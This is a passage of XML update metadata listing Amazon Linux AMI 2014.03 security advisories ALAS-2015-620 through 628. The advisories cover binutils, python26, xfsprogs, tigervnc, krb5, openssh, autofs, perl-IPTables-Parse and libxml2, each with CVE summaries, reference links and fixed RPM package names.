release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-4.51.amzn1.i686.rpm</filename></package><package 
name="postgresql8-docs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-4.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-620</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-620: medium priority package update for binutils</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8738:
A heap-based buffer overflow flaw was found in the way certain binutils utilities processed archive files. If a user were tricked into processing a specially crafted archive file, it could cause the utility used to process that archive to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1162666:
CVE-2014-8738 binutils: out of bounds memory write
CVE-2014-8737:
A directory traversal flaw was found in the strip and objcopy utilities. A specially crafted file could cause strip or objdump to overwrite an arbitrary file writable by the user running either of these utilities.
1162655:
CVE-2014-8737 binutils: directory traversal vulnerability
CVE-2014-8504:
A stack-based buffer overflow flaw was found in the SREC parser of the libbfd library. A specially crafted file could cause an application using the libbfd library to crash or, potentially, execute arbitrary code with the privileges of the user running that application.
1162621:
CVE-2014-8504 binutils: stack overflow in the SREC parser
CVE-2014-8503:
A stack-based buffer overflow flaw was found in the way objdump processed IHEX files. A specially crafted IHEX file could cause objdump to crash or, potentially, execute arbitrary code with the privileges of the user running objdump.
1162607:
CVE-2014-8503 binutils: stack overflow in objdump when parsing specially crafted ihex file
CVE-2014-8502:
It was found that the fix for the CVE-2014-8485 issue was incomplete: a heap-based buffer overflow in the objdump utility could cause it to crash or, potentially, execute arbitrary code with the privileges of the user running objdump when processing specially crafted files.
1162594:
CVE-2014-8502 binutils: heap overflow in objdump when parsing a crafted ELF/PE binary file (incomplete fix for CVE-2014-8485)
CVE-2014-8501:
A stack-based buffer overflow flaw was found in the way various binutils utilities processed certain files. If a user were tricked into processing a specially crafted file, it could cause the utility used to process that file to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1162570:
CVE-2014-8501 binutils: out-of-bounds write when parsing specially crafted PE executable
CVE-2014-8485:
A buffer overflow flaw was found in the way various binutils utilities processed certain files. If a user were tricked into processing a specially crafted file, it could cause the utility used to process that file to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1157276:
CVE-2014-8485 binutils: lack of range checking leading to controlled write in _bfd_elf_setup_sections()
CVE-2014-8484:
An integer overflow flaw was found in the way the strings utility processed certain files. If a user were tricked into running the strings utility on a specially crafted file, it could cause the strings executable to crash.
1156272:
CVE-2014-8484 binutils: invalid read flaw in libbfd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8484" title="" id="CVE-2014-8484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8485" title="" id="CVE-2014-8485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8501" title="" id="CVE-2014-8501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8502" title="" id="CVE-2014-8502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8503" title="" id="CVE-2014-8503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8504" title="" id="CVE-2014-8504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8737" title="" id="CVE-2014-8737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8738" title="" id="CVE-2014-8738" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="binutils-debuginfo" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-debuginfo-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils-devel" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-devel-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils-devel" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="i686"><filename>Packages/binutils-devel-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package><package name="binutils-debuginfo" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" 
arch="i686"><filename>Packages/binutils-debuginfo-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package><package name="binutils" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="i686"><filename>Packages/binutils-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-621</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-621: medium priority package update for python26</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7185:
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function.
An integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.
1146026:
CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
CVE-2014-4650:
It was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose source of scripts in the cgi-bin directory.
1113527:
CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650" title="" id="CVE-2014-4650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185" title="" id="CVE-2014-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-devel" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.83.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-622</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-622: low priority package update for xfsprogs</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-2150:
It was discovered that the xfs_metadump tool of the xfsprogs suite did not fully adhere to the standards of obfuscation described in its man page. In case a user with the necessary privileges used xfs_metadump and relied on the advertised obfuscation, the generated data could contain unexpected traces of potentially sensitive information.
817696:
CVE-2012-2150 xfsprogs: xfs_metadump information disclosure flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2150" title="" id="CVE-2012-2150" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xfsprogs-debuginfo" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-debuginfo-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs-devel" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-devel-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-3.2.2-2.20.amzn1.i686.rpm</filename></package><package name="xfsprogs-devel" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-devel-3.2.2-2.20.amzn1.i686.rpm</filename></package><package name="xfsprogs-debuginfo" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-debuginfo-3.2.2-2.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-623</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-623: medium priority package update for tigervnc</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8241:
A NULL pointer dereference flaw was found in TigerVNC&#039;s XRegion. A malicious VNC server could use this flaw to cause a client to crash.
1151312:
CVE-2014-8241 tigervnc: NULL pointer dereference flaw in XRegion
CVE-2014-8240:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way TigerVNC handled screen sizes. A malicious VNC server could use this flaw to cause a client to crash or, potentially, execute arbitrary code on the client.
1151307:
CVE-2014-8240 tigervnc: integer overflow flaw, leading to a heap-based buffer overflow in screen size handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8240" title="" id="CVE-2014-8240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8241" title="" id="CVE-2014-8241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-server-module" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.3.1-3.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-624</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-624: medium priority 
package update for krb5</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2694:
A flaw was found in the OTP kdcpreauth module of MIT Kerberos. A remote attacker could use this flaw to bypass the requires_preauth flag on a client principal and obtain a ciphertext encrypted in the principal&#039;s long-term key. This ciphertext could be used to conduct an off-line dictionary attack against the user&#039;s password.
1216133:
CVE-2015-2694 krb5: issues in OTP and PKINIT kdcpreauth modules leading to requires_preauth bypass
CVE-2014-5355:
It was found that the krb5_read_message() function of MIT Kerberos did not correctly sanitize input, and could create invalid krb5_data objects. A remote, unauthenticated attacker could use this flaw to crash a Kerberos child process via a specially crafted request.
1193939:
CVE-2014-5355 krb5: unauthenticated denial of service in recvauth_common() and others
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355" title="" id="CVE-2014-5355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2694" title="" id="CVE-2015-2694" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="10.39.amzn1" 
epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.13.2-10.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-625</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-625: medium priority package update for openssh</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6564:
Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.
A use-after-free flaw was found in OpenSSH. An attacker able to fully compromise a non-privileged pre-authentication process using a different flaw could possibly cause sshd to crash or execute arbitrary code with root privileges.
1252852:
CVE-2015-6564 openssh: Use-after-free bug related to PAM support
CVE-2015-6563:
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.
A flaw was found in the way OpenSSH handled PAM authentication when using privilege separation. An attacker with valid credentials on the system and able to fully compromise a non-privileged pre-authentication process using a different flaw could use this flaw to authenticate as other users.
1252844:
CVE-2015-6563 openssh: Privilege separation weakness related to PAM support
CVE-2015-5600:
It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks.
1245969:
CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5600" title="" id="CVE-2015-5600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6563" title="" id="CVE-2015-6563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6564" title="" id="CVE-2015-6564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="22.58.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-server-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.22.58.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.22.58.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-22.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-626</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-626: medium priority package update for autofs</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8169:
It was found that program-based automounter maps that used interpreted languages such as Python would use standard environment variables to locate and load modules of those languages. A local attacker could potentially use this flaw to escalate their privileges on the system.
1192565:
CVE-2014-8169 autofs: priv escalation via interpreter load path for program based automount maps
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8169" title="" id="CVE-2014-8169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="autofs" version="5.0.7" release="54.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/autofs-5.0.7-54.22.amzn1.x86_64.rpm</filename></package><package name="autofs-debuginfo" version="5.0.7" release="54.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/autofs-debuginfo-5.0.7-54.22.amzn1.x86_64.rpm</filename></package><package name="autofs" version="5.0.7" release="54.22.amzn1" epoch="1" arch="i686"><filename>Packages/autofs-5.0.7-54.22.amzn1.i686.rpm</filename></package><package name="autofs-debuginfo" version="5.0.7" release="54.22.amzn1" epoch="1" arch="i686"><filename>Packages/autofs-debuginfo-5.0.7-54.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-627</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-627: low priority package update for perl-IPTables-Parse</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8326:
1267962:
CVE-2015-8326 perl-IPTables-Parse: Use of predictable names for temporary files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8326" title="" id="CVE-2015-8326" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-IPTables-Parse" version="1.5" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-IPTables-Parse-1.5-2.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-628</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-628: medium priority package update for libxml2</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8317:
1281930:
CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration
CVE-2015-8242:
1281950:
CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode
CVE-2015-8241:
1281936:
CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar
CVE-2015-7942:
The xmlParseConditionalSections function in parser.c in libxml2 does not properly skip intermediary entities when it stops parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via crafted XML data, a different vulnerability than CVE-2015-7941.
1276297:
CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections()
CVE-2015-7941:
libxml2 2.9.2 does not properly stop parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and libxml2 crash) via crafted XML data to the (1) xmlParseEntityDecl or (2) xmlParseConditionalSections function in parser.c, as demonstrated by non-terminated entities.
1274222:
CVE-2015-7941 libxml2: Out-of-bounds memory access
CVE-2015-7500:
1281943:
CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc
CVE-2015-7499:
1281925:
CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW
CVE-2015-7498:
1281879:
CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl
CVE-2015-7497:
1281862:
CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey
CVE-2015-5312:
1276693:
CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input
CVE-2015-1819:
A denial of service flaw was found in the way the libxml2 library parsed certain XML files. An attacker could provide a specially crafted XML file that, when parsed by an application using libxml2, could cause that application to use an excessive amount of memory.
1211278:
CVE-2015-1819 libxml2: denial of service processing a crafted XML document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1819" title="" id="CVE-2015-1819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5312" title="" id="CVE-2015-5312" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7497" title="" id="CVE-2015-7497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7498" title="" id="CVE-2015-7498" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7499" title="" id="CVE-2015-7499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7500" title="" id="CVE-2015-7500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7941" title="" id="CVE-2015-7941" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7942" title="" id="CVE-2015-7942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8241" title="" id="CVE-2015-8241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8242" title="" id="CVE-2015-8242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8317" title="" id="CVE-2015-8317" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2" 
